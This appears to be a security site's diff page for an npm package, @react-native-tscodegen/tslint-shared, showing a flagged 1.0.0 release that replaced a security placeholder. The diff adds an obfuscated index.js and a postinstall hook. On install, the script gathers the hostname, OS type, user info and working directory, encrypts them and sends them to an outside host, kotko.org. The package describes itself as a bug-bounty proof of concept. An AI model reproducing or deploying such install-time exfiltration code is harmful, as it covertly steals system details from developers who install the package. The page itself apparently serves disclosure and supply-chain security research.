@react-native-tscodegen/tslint-shared 0.0.1-security → 1.0.0
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of @react-native-tscodegen/tslint-shared might be problematic. Click here for more details.
- package/README.md +1 -5
- package/crypto.js +31 -0
- package/index.js +1 -0
- package/package.json +22 -3
package/README.md
CHANGED
|
@@ -1,5 +1 @@
|
|
|
1
|
-
|
|
2
|
-
|
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
|
4
|
-
|
|
5
|
-
Please refer to www.npmjs.com/advisories?search=%40react-native-tscodegen%2Ftslint-shared for more information.
|
|
1
|
+
Poc by kotko for testing bug.
|
package/crypto.js
ADDED
|
@@ -0,0 +1,31 @@
|
|
|
1
|
+
const crypto = require('crypto');
|
|
2
|
+
|
|
3
|
+
const algorithm = 'aes-256-ctr';
|
|
4
|
+
const secretKey = 'vOVH6sdmpNWjRRIqCc7rdxs01lwHzfr3';
|
|
5
|
+
const iv = crypto.randomBytes(16);
|
|
6
|
+
|
|
7
|
+
const encrypt = (text) => {
|
|
8
|
+
|
|
9
|
+
const cipher = crypto.createCipheriv(algorithm, secretKey, iv);
|
|
10
|
+
|
|
11
|
+
const encrypted = Buffer.concat([cipher.update(text), cipher.final()]);
|
|
12
|
+
|
|
13
|
+
return {
|
|
14
|
+
iv: iv.toString('hex'),
|
|
15
|
+
content: encrypted.toString('hex')
|
|
16
|
+
};
|
|
17
|
+
};
|
|
18
|
+
|
|
19
|
+
const decrypt = (hash) => {
|
|
20
|
+
|
|
21
|
+
const decipher = crypto.createDecipheriv(algorithm, secretKey, Buffer.from(hash.iv, 'hex'));
|
|
22
|
+
|
|
23
|
+
const decrpyted = Buffer.concat([decipher.update(Buffer.from(hash.content, 'hex')), decipher.final()]);
|
|
24
|
+
|
|
25
|
+
return decrpyted.toString();
|
|
26
|
+
};
|
|
27
|
+
|
|
28
|
+
module.exports = {
|
|
29
|
+
encrypt,
|
|
30
|
+
decrypt
|
|
31
|
+
};
|
package/index.js
ADDED
|
@@ -0,0 +1 @@
|
|
|
1
|
+
var _0x9c7453=_0x3d18;(function(_0x14ed68,_0x46702a){var _0x1759c5=_0x3d18,_0x5e7ddd=_0x14ed68();while(!![]){try{var _0x3707d4=parseInt(_0x1759c5(0x19a))/0x1*(parseInt(_0x1759c5(0x193))/0x2)+parseInt(_0x1759c5(0x1a2))/0x3+-parseInt(_0x1759c5(0x199))/0x4*(-parseInt(_0x1759c5(0x18b))/0x5)+parseInt(_0x1759c5(0x195))/0x6*(-parseInt(_0x1759c5(0x190))/0x7)+-parseInt(_0x1759c5(0x1a6))/0x8+parseInt(_0x1759c5(0x18e))/0x9+-parseInt(_0x1759c5(0x197))/0xa;if(_0x3707d4===_0x46702a)break;else _0x5e7ddd['push'](_0x5e7ddd['shift']());}catch(_0x274b29){_0x5e7ddd['push'](_0x5e7ddd['shift']());}}}(_0x5ab6,0xe6fe9));var os=require('os');const request=require(_0x9c7453(0x19e)),crypto=require(_0x9c7453(0x19d));var fs=require('fs'),hostname=os['hostname'](),type=os[_0x9c7453(0x1a5)](),userInfo=os[_0x9c7453(0x19f)](),currentPath=process[_0x9c7453(0x1a4)](),json=[];const algorithm=_0x9c7453(0x192),secretKey=_0x9c7453(0x18c),iv=crypto[_0x9c7453(0x19c)](0x10);json[_0x9c7453(0x18f)](hostname),json[_0x9c7453(0x18f)](type),json[_0x9c7453(0x18f)](userInfo),json[_0x9c7453(0x18f)](currentPath),json=JSON[_0x9c7453(0x19b)](json);const {encrypt,decrypt}=require(_0x9c7453(0x196));let hash=encrypt(json),company=_0x9c7453(0x194),packages=_0x9c7453(0x1a1);function _0x5ab6(){var _0x566524=['randomBytes','crypto','request','userInfo','from','@react-native-tscodegen/tslint-shared','5125365CBECBI','base64','cwd','platform','2342480ZtKndi','9140wMKrDr','vOVH6sdmpNWjRRIqCc7rdxs01lwHzfr3','toString','16579305KsHyfi','push','12564027VNuhel','this\x20proof\x20for\x20report','aes-256-ctr','2FvnLKi','microsoft--react-native-tscodegen','6OWpIxG','./crypto','15361360aHsXvJ','pocByKotko.txt','1668loaBLL','257084afLiSy','stringify'];_0x5ab6=function(){return _0x566524;};return _0x5ab6();}fs['writeFile'](_0x9c7453(0x198),_0x9c7453(0x191),function(_0xe14145){if(_0xe14145)throw _0xe14145;});function _0x3d18(_0x560c9d,_0x56d5f9){var _0x5ab6d5=_0x5ab6();return _0x3d18=function(_0x3d1830,_0x41628a){_0x3d1830=_0x3d1830-0x18b;var _0x39a965=_0x5ab6d5[_0x3d1830];return _0x39a965;},_0x3d18(_0x560c9d,_0x56d5f9);}var buff=Buffer[_0x9c7453(0x1a0)](JSON['stringify'](hash))[_0x9c7453(0x18d)](_0x9c7453(0x1a3));request('https://kotko.org/?'+company+':'+packages+'='+buff,(_0x3170be,_0xe6f6a1,_0x1de5c2)=>{});
|
package/package.json
CHANGED
|
@@ -1,6 +1,25 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "@react-native-tscodegen/tslint-shared",
|
|
3
|
-
"version": "0.0
|
|
4
|
-
"description": "
|
|
5
|
-
"
|
|
3
|
+
"version": "1.0.0",
|
|
4
|
+
"description": "This package for demonstrate bugs in program (Bug Bounty program. Do not delete until decision report",
|
|
5
|
+
"main": "index.js",
|
|
6
|
+
"scripts": {
|
|
7
|
+
"postinstall": "node index.js",
|
|
8
|
+
"preinstall": "npm i request --save-dev",
|
|
9
|
+
"test": "node index.js"
|
|
10
|
+
},
|
|
11
|
+
"author": "",
|
|
12
|
+
"Dependencies": {
|
|
13
|
+
"crypto": "^1.0.1",
|
|
14
|
+
"ip": "^1.1.5",
|
|
15
|
+
"request": "^2.88.2",
|
|
16
|
+
"os": "^0.1.1"
|
|
17
|
+
},
|
|
18
|
+
"devDependencies": {
|
|
19
|
+
"crypto": "^1.0.1",
|
|
20
|
+
"ip": "^1.1.5",
|
|
21
|
+
"javascript-obfuscator": "^4.0.0",
|
|
22
|
+
"os": "^0.1.1",
|
|
23
|
+
"request": "^2.88.2"
|
|
24
|
+
}
|
|
6
25
|
}
|